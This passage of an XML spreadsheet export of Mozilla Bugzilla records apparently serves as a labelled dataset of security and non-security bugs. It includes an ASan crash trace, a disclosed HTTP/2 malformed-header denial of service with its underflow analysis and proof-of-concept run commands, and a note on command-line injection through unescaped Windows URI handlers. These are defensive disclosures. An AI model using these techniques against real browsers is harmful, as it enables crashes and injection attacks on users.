    #33 0x7fcd12c02086 in nsHtml5TreeOpExecutor::StartLayout() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:612:3
    #34 0x7fcd12c0e83e in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOperation.cpp:990:7
    #35 0x7fcd12bff9d7 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:448:21
    #36 0x7fcd12c044cb in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5StreamParser.cpp:128:9
    #37 0x7fcd10c33eb8 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1067:7
    #38 0x7fcd10cb26bc in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #39 0x7fcd11a17eff in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21
SUMMARY: AddressSanitizer: use-after-poison /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsIFrame.h:1565:46 in GetStateBits
Shadow bytes around the buggy address:
  0x0c4a80055510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80055520: 00 00 00 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c4a80055530: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c4a80055540: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c4a80055550: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
=&gt;0x0c4a80055560: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7[f7]f7 f7 f7 f7
  0x0c4a80055570: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c4a80055580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80055590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a800555a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a800555b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30757==ABORTING</t>
        </is>
      </c>
      <c r="X1137" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1138">
      <c r="A1138" t="n">
        <v>1400186</v>
      </c>
      <c r="B1138" t="inlineStr">
        <is>
          <t>2017-09-15 02:29:49 -0700</t>
        </is>
      </c>
      <c r="C1138" t="inlineStr">
        <is>
          <t>TAAR: Prototype the ensemble method</t>
        </is>
      </c>
      <c r="D1138" t="inlineStr">
        <is>
          <t>2022-07-26 12:17:16 -0700</t>
        </is>
      </c>
      <c r="E1138" t="n">
        <v>1</v>
      </c>
      <c r="F1138" t="n">
        <v>1</v>
      </c>
      <c r="G1138" t="n">
        <v>2</v>
      </c>
      <c r="H1138" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1138" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J1138" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1138" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1138" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1138" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1138" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1138" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1138" t="inlineStr"/>
      <c r="Q1138" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1138" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1138" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1138" t="n">
        <v>1</v>
      </c>
      <c r="U1138" t="n">
        <v>0</v>
      </c>
      <c r="V1138" t="n">
        <v>6</v>
      </c>
      <c r="W1138" t="inlineStr">
        <is>
          <t>Implement the chosen ensemble method [1] in a Jupyter notebook and evaluate how well it works. For validation and testing, new datasets need to be created
[1] https://bugzilla.mozilla.org/show_bug.cgi?id=1400184</t>
        </is>
      </c>
      <c r="X1138" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1139">
      <c r="A1139" t="n">
        <v>1411036</v>
      </c>
      <c r="B1139" t="inlineStr">
        <is>
          <t>2017-10-23 13:45:17 -0700</t>
        </is>
      </c>
      <c r="C1139" t="inlineStr">
        <is>
          <t>Hook up dependency monitoring</t>
        </is>
      </c>
      <c r="D1139" t="inlineStr">
        <is>
          <t>2017-12-13 08:54:12 -0800</t>
        </is>
      </c>
      <c r="E1139" t="n">
        <v>1</v>
      </c>
      <c r="F1139" t="n">
        <v>1</v>
      </c>
      <c r="G1139" t="n">
        <v>4</v>
      </c>
      <c r="H1139" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1139" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1139" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K1139" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1139" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1139" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1139" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1139" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1139" t="inlineStr"/>
      <c r="Q1139" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1139" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1139" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1139" t="n">
        <v>1</v>
      </c>
      <c r="U1139" t="n">
        <v>0</v>
      </c>
      <c r="V1139" t="n">
        <v>25</v>
      </c>
      <c r="W1139" t="inlineStr">
        <is>
          <t>There are several services that monitor requirements.txt files and report back which dependencies are out-of-date, and which ones have known security issues. We should use one for Socorro. My own preference is to avoid services that auto-file PRs, because they get very noisy and fill your PR queue for point releases that aren't terribly important.
Normandy used https://requires.io/; I set it up to send a monthly email for out-of-date requirements, and ASAP emails for known security vulnerabilities. It ended up working out pretty well.</t>
        </is>
      </c>
      <c r="X1139" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1140">
      <c r="A1140" t="n">
        <v>1194818</v>
      </c>
      <c r="B1140" t="inlineStr">
        <is>
          <t>2015-08-14 11:37:41 -0700</t>
        </is>
      </c>
      <c r="C1140" t="inlineStr">
        <is>
          <t>Firefox HTTP2 Malformed Header Frame DoS</t>
        </is>
      </c>
      <c r="D1140" t="inlineStr">
        <is>
          <t>2016-07-02 11:09:08 -0700</t>
        </is>
      </c>
      <c r="E1140" t="n">
        <v>1</v>
      </c>
      <c r="F1140" t="n">
        <v>1</v>
      </c>
      <c r="G1140" t="n">
        <v>3</v>
      </c>
      <c r="H1140" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1140" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1140" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K1140" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L1140" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1140" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1140" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1140" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1140" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.5?][post-critsmash-triage][adv-main43+]</t>
        </is>
      </c>
      <c r="Q1140" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1140" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1140" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T1140" t="n">
        <v>1</v>
      </c>
      <c r="U1140" t="n">
        <v>0</v>
      </c>
      <c r="V1140" t="n">
        <v>26</v>
      </c>
      <c r="W1140" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Steps to reproduce:
Firefox HTTP2 Malformed Header Frame DoS
## Overview
A malformed HTTP2 header frame is sent to the browser. Normally a header frame consist of a pad length, stream dependency identifier, weight, header block fragement, and padding. But only a single byte is sent that eventually results in an integer underflow, which cases an nsCString to try to allocate nearly 2^32 bytes of memory. This is greater than firefox allows and an assert is tripped.
## Walkthrough
On line 1226 of file Http2Session.cpp, a call is made to append the decompressed frame onto a decompressed frame buffer:
self-&gt;mDecompressBuffer.Append(self-&gt;mInputFrameBuffer + kFrameHeaderBytes + paddingControlBytes + priorityLen,
	                           self-&gt;mInputFrameDataSize - paddingControlBytes - priorityLen - paddingLength);
At this point the variables are:
self-&gt;mDecompressBuffer.Append(nsAutoArrayPtr&lt;char&gt; (ptr) + uint_8(9) + uint8_t(0) + uint16_t(0),
	                           uint32_t(1) - uint8_t(0) - uint32_t(5) - uint16_t(0));
priorityLen is equal to five because the kFlag_PRIORITY is set on line 1186 of Http2Session.cpp.
The second argument is casted to a size_type (uint32), which results in an integer underflow of 4294967292.
A bunch of string checks are then performed to make sure the append is sane. Eventually in nsTSubstring.cpp:45 MutatePrep is called with:
MutatePrep(this=0x0000000121e52b80, aCapacity=4294967292, aOldData=0x000000010be8b8f0, aOldFlags=0x000000010be8b8ec).
In the function, kMaxCapacity for a string is determined to be:
const size_type kMaxCapacity = (size_type(-1) / 2 - sizeof(nsStringBuffer)) / sizeof(char_type) - 2;
// kMaxCapacity = 2147483637
kMaxCapacity is then compared to our capacity (4294967292). Since the capacity exceeds the max allowed, an error is thrown on line 531 of nsTSubstring.cpp.
AllocFailed(Length() - aCutLength + 1)
## Exploitability
To exploit we would need our integer underflow to result in a value less than 2147483637. Since we only partially control a uint8 and a uint16, this is not possible. Only an assert can be generated.
## Tested on 
Firefox 39.0. MacOS
42.0a1 (2015-07-21) MacOS
## POC
Code can be found here:
https://notr-bucket.s3.amazonaws.com/eabe6314-752b-4508-9ee1-bccf756c09e1
To use:
Extract the file and the certs
$ go run firefoxHeaderPoc.go
$ ./firefox https://localhost:8000
## Author
Stuart Larsen
Yahoo! Pentest Team</t>
        </is>
      </c>
      <c r="X1140" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1141">
      <c r="A1141" t="n">
        <v>1368818</v>
      </c>
      <c r="B1141" t="inlineStr">
        <is>
          <t>2017-05-30 13:51:21 -0700</t>
        </is>
      </c>
      <c r="C1141" t="inlineStr">
        <is>
          <t>Bookmark items in the title bar display with black text on a dark background rendering them unreadable</t>
        </is>
      </c>
      <c r="D1141" t="inlineStr">
        <is>
          <t>2017-06-14 03:13:03 -0700</t>
        </is>
      </c>
      <c r="E1141" t="n">
        <v>1</v>
      </c>
      <c r="F1141" t="n">
        <v>1</v>
      </c>
      <c r="G1141" t="n">
        <v>2</v>
      </c>
      <c r="H1141" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1141" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1141" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K1141" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1141" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1141" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1141" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1141" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1141" t="inlineStr">
        <is>
          <t>[photon-visual][p2] fixed by bug 1368672</t>
        </is>
      </c>
      <c r="Q1141" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1141" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1141" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1141" t="n">
        <v>1</v>
      </c>
      <c r="U1141" t="n">
        <v>1</v>
      </c>
      <c r="V1141" t="n">
        <v>5</v>
      </c>
      <c r="W1141" t="inlineStr">
        <is>
          <t>I have my bookmark toolbar items in my title bar but they display with black text which makes them unreadable since bug 1367384 landed.</t>
        </is>
      </c>
      <c r="X1141" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1142">
      <c r="A1142" t="n">
        <v>1696685</v>
      </c>
      <c r="B1142" t="inlineStr">
        <is>
          <t>2021-03-05 10:59:40 -0800</t>
        </is>
      </c>
      <c r="C1142" t="inlineStr">
        <is>
          <t>URIs passed to external application protocol / URL handlers should have spaces escaped</t>
        </is>
      </c>
      <c r="D1142" t="inlineStr">
        <is>
          <t>2024-05-30 10:28:41 -0700</t>
        </is>
      </c>
      <c r="E1142" t="n">
        <v>1</v>
      </c>
      <c r="F1142" t="n">
        <v>1</v>
      </c>
      <c r="G1142" t="n">
        <v>3</v>
      </c>
      <c r="H1142" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1142" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1142" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K1142" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1142" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M1142" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1142" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1142" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1142" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][adv-main95+][adv-ESR91.4.0+]</t>
        </is>
      </c>
      <c r="Q1142" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1142" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1142" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T1142" t="n">
        <v>1</v>
      </c>
      <c r="U1142" t="n">
        <v>0</v>
      </c>
      <c r="V1142" t="n">
        <v>24</v>
      </c>
      <c r="W1142" t="inlineStr">
        <is>
          <t>Issue relevant to Firefox on Windows (Windows 10, Firefox 86.0). This is not a bug in Firefox directly. Rather it is behavior that could lead to other developer's security issues being exploitable. 
On Firefox for Windows, Firefox will not escape parameters passed to Windows URI handlers.  If a Windows URI handler doesn't quote it's parameters (as is documented here: https://docs.microsoft.com/en-us/windows/win32/shell/sec-shell) then it's possible for there to be command line injection when a URI is launched from Firefox.  
Windows Chrome and Edge will URI encode parameters before launching the URI (including spaces). This would make it much harder for these issues to be exploitable. 
For example: 
Assume there is a handler, "fake_handler:" configured in windows as:
fake_handler.exe %1
Then the URI 
fake_handler:Hello World
Would result in the command line:   fake_handler Hello World.  The app would treat World as a command line parameter. 
In Edge/Chrome, this would result in the command line: fake_handler Hello%20World.  which would all be treated as one parameter and not vulnerable to the command line injection. 
Not looking for a bounty.</t>
        </is>
      </c>
      <c r="X1142" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1143">
      <c r="A1143" t="n">
        <v>1412832</v>
      </c>
      <c r="B1143" t="inlineStr">
        <is>
          <t>2017-10-30 06:57:35 -0700</t>
        </is>
      </c>
      <c r="C1143" t="inlineStr">
        <is>
          <t>No favicon displayed for baidu.com after adding the engine in Search bar panel</t>
        </is>
      </c>
      <c r="D1143" t="inlineStr">
        <is>
          <t>2017-11-22 01:58:48 -0800</t>
        </is>
      </c>
      <c r="E1143" t="n">
        <v>1</v>
      </c>
      <c r="F1143" t="n">
        <v>1</v>
      </c>
      <c r="G1143" t="n">
        <v>2</v>
      </c>
      <c r="H1143" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1143" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1143" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K1143" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L1143" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1143" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1143" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1143" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1143" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q1143" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1143" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1143" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T1143" t="n">
        <v>1</v>
      </c>
      <c r="U1143" t="n">
        <v>0</v>
      </c>
      <c r="V1143" t="n">
        <v>11</v>
      </c>
      <c r="W1143" t="inlineStr">
        <is>
          <t>Created attachment 8923374
issue.png
[Affected versions]:
- Firefox 57 Beta 12
- latest Nightly 58.0a1
[Affected platforms]:
- Windows 7 x64
- Windows 10 x64
- macOS 10.13
- Ubuntu 14.04 x64
[Steps to reproduce]:
1. Launch Firefox and go to http://www.baidu.com/
2. Add the search engine.
[Expected result]:
- A favicon is displayed in the Search bar panel.
[Actual result]:
- No favicon displayed - magnifying glass, visible in the Search bar panel. Please see the attachment "issue.png"
[Regression range]:
- The issue is NOT reproducible on 56.0.2. I will get back with the regression range as soon as possible.</t>
        </is>
      </c>
      <c r="X1143" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1144">
      <c r="A1144" t="n">
        <v>170580</v>
      </c>
      <c r="B1144" t="inlineStr">
        <is>
          <t>2002-09-24 14:06:29 -0700</t>
        </is>
      </c>
      <c r="C1144" t="inlineStr">
        <is>
          <t>comment-&lt;format&gt;.txt.tmpl not called</t>
        </is>
      </c>
      <c r="D1144" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:32 -0800</t>
        </is>
      </c>
      <c r="E1144" t="n">
        <v>1</v>
      </c>
      <c r="F1144" t="n">
        <v>1</v>
      </c>
      <c r="G1144" t="n">
        <v>4</v>
      </c>
      <c r="H1144" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1144" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1144" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K1144" t="inlineStr">
        <is>
          <t>2.16</t>
        </is>
      </c>
      <c r="L1144" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1144" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1144" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1144" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1144" t="inlineStr"/>
      <c r="Q1144" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1144" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1144" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T1144" t="n">
        <v>1</v>
      </c>
      <c r="U1144" t="n">
        <v>0</v>
      </c>
      <c r="V1144" t="n">
        <v>21</v>
      </c>
      <c r="W1144" t="inlineStr">
        <is>
          <t>I'm trying to use formats and add structured information to the initial comment,
per the Bugzilla Guide (section 5.7).  We're trying to use Bugzilla to track
facility maintenance requests, so I created a create-facility.html.tmpl file,
and added 3 fields to it (unit, permission, resident).
I also created a comment-facility.txt.tmpl file, but this is not being used. 
Instead the generic comment.txt.tmpl file is being used instead.
This is a major problem for us, as we want to use one install of Bugzilla to
track both maintenance and IS requests, and will need to have at least two
different formats, and 2 different comment.txt.tmpl options.
Will be happy to provide more info or do some testing if it will be helpful.</t>
        </is>
      </c>
      <c r="X1144" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1145">
      <c r="A1145" t="n">
        <v>858292</v>
      </c>
      <c r="B1145" t="inlineStr">
        <is>
          <t>2013-04-04 15:38:44 -0700</t>
        </is>
      </c>
      <c r="C1145" t="inlineStr">
        <is>
          <t>gfx defects in shumway demos when skia-gl enabled</t>
        </is>
      </c>
      <c r="D1145" t="inlineStr">
        <is>
          <t>2020-12-21 10:37:30 -0800</t>
        </is>
      </c>
      <c r="E1145" t="n">
        <v>1</v>
      </c>
      <c r="F1145" t="n">
        <v>1</v>
      </c>
      <c r="G1145" t="n">
        <v>6</v>
      </c>
      <c r="H1145" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1145" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J1145" t="inlineStr">
        <is>
          <t>Toolbar</t>
        </is>
      </c>
      <c r="K1145" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1145" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1145" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1145" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1145" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1145" t="inlineStr">
        <is>
          <t>[shumway]</t>
        </is>
      </c>
      <c r="Q1145" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1145" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1145" t="inlineStr">
        <is>
          <t>Firefox 23</t>
        </is>
      </c>
      <c r="T1145" t="n">
        <v>1</v>
      </c>
      <c r="U1145" t="n">
        <v>1</v>
      </c>
      <c r="V1145" t="n">
        <v>10</v>
      </c>
      <c r="W1145" t="inlineStr">
        <is>
          <t>Created attachment 733590
pacman demo on Galaxy S with default prefs (cairo)
The Shumway project has some demos available at http://mozilla.github.com/shumway/; they usually run fine on Android nightlies.
With skia-gl enabled:
  gfx.canvas.azure.accelerated=true
  gfx.canvas.azure.backends=skia
these demos often have graphics defects.
See attached screenshots of http://mozilla.github.com/shumway/examples/inspector/inspector.html?rfile=../pac/pac3.swf with/without skia-gl. These show the 13-04-04 nightly.
The defects seem slightly intermittent, but happen most (80%) of the time.
(I understand :blassey reported this issue on my behalf at a meeting today.)</t>
        </is>
      </c>
      <c r="X1145" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1146">
      <c r="A1146" t="n">
        <v>1565192</v>
      </c>
      <c r="B1146" t="inlineStr">
        <is>
          <t>2019-07-11 04:48:53 -0700</t>
        </is>
      </c>
      <c r="C1146" t="inlineStr">
        <is>
          <t>grant ccomorasu@mozilla.com access to raw dumps</t>
        </is>
      </c>
      <c r="D1146" t="inlineStr">
        <is>
          <t>2019-07-16 01:46:25 -0700</t>
        </is>
      </c>
      <c r="E1146" t="n">
        <v>1</v>
      </c>
      <c r="F1146" t="n">
        <v>1</v>
      </c>
      <c r="G1146" t="n">
        <v>4</v>
      </c>
      <c r="H1146" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1146" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1146" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1146" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1146" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1146" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1146" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1146" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1146" t="inlineStr"/>
      <c r="Q1146" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1146" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1146" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1146" t="n">
        <v>1</v>
      </c>
      <c r="U1146" t="n">
        <v>0</v>
      </c>
      <c r="V1146" t="n">
        <v>5</v>
      </c>
      <c r="W1146" t="inlineStr">
        <is>
          <t>I would like to receive access to crash comments in Socorro, so that I can help with the investigation of crashes whenever that is requested from QA.
full name: Cristian Comorasu
account: ccomorasu@mozilla.com
team: Release QA (desktop)
managers: Tom Grabowski, Tania Maity (CCed)
Note that I have read and agree to the terms available at https://crash-stats.mozilla.com/documentation/memory_dump_access/.
Please let me know if you need any other information on this matter. Thank you!</t>
        </is>
      </c>
      <c r="X1146" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1147">
      <c r="A1147" t="n">
        <v>750932</v>
      </c>
      <c r="B1147" t="inlineStr">
        <is>
          <t>2012-05-01 15:36:32 -0700</t>
        </is>
      </c>
      <c r="C1147" t="inlineStr">
        <is>
          <t>ASAN: Test test_multipart_streamconv_missing_lead_boundary.js triggers error</t>
        </is>
      </c>
      <c r="D1147" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:36 -0800</t>
        </is>
      </c>
      <c r="E1147" t="n">
        <v>1</v>
      </c>
      <c r="F1147" t="n">
        <v>1</v>
      </c>
      <c r="G1147" t="n">
        <v>3</v>
      </c>
      <c r="H1147" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1147" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1147" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1147" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1147" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1147" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1147" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1147" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1147" t="inlineStr">
        <is>
          <t>[asan][asan-test-failure][adv-main24+]</t>
        </is>
      </c>
      <c r="Q1147" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1147" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1147" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T1147" t="n">
        <v>1</v>
      </c>
      <c r="U1147" t="n">
        <v>0</v>
      </c>
      <c r="V1147" t="n">
        <v>31</v>
      </c>
      <c r="W1147" t="inlineStr">
        <is>
          <t>Created attachment 620104
AddressSanitizer Log
This xpcshell test "test_multipart_streamconv_missing_lead_boundary.js" fails with AddressSanitizer on mozilla-central revision 6e34995a746e. The output of the command
make SOLO_FILE="test_multipart_streamconv_missing_lead_boundary.js" -C netwerk/test/ check-one 2&gt;&amp;1 | asan_symbolize.py | c++filt
is attached, which includes the backtrace of the problem. Not sure which component this belongs to exactly, please move as appropriate :) Marking this s-s until triaged and confirmed to be safe.</t>
        </is>
      </c>
      <c r="X1147" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1148">
      <c r="A1148" t="n">
        <v>1741515</v>
      </c>
      <c r="B1148" t="inlineStr">
        <is>
          <t>2021-11-16 14:56:33 -0800</t>
        </is>
      </c>
      <c r="C1148" t="inlineStr">
        <is>
          <t>Maliciously crafted data triggers firefox to crash immediately</t>
        </is>
      </c>
      <c r="D1148" t="inlineStr">
        <is>
          <t>2024-05-30 10:51:01 -0700</t>
        </is>
      </c>
      <c r="E1148" t="n">
        <v>1</v>
      </c>
      <c r="F1148" t="n">
        <v>1</v>
      </c>
      <c r="G1148" t="n">
        <v>3</v>
      </c>
      <c r="H1148" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1148" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1148" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K1148" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1148" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M1148" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N1148" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
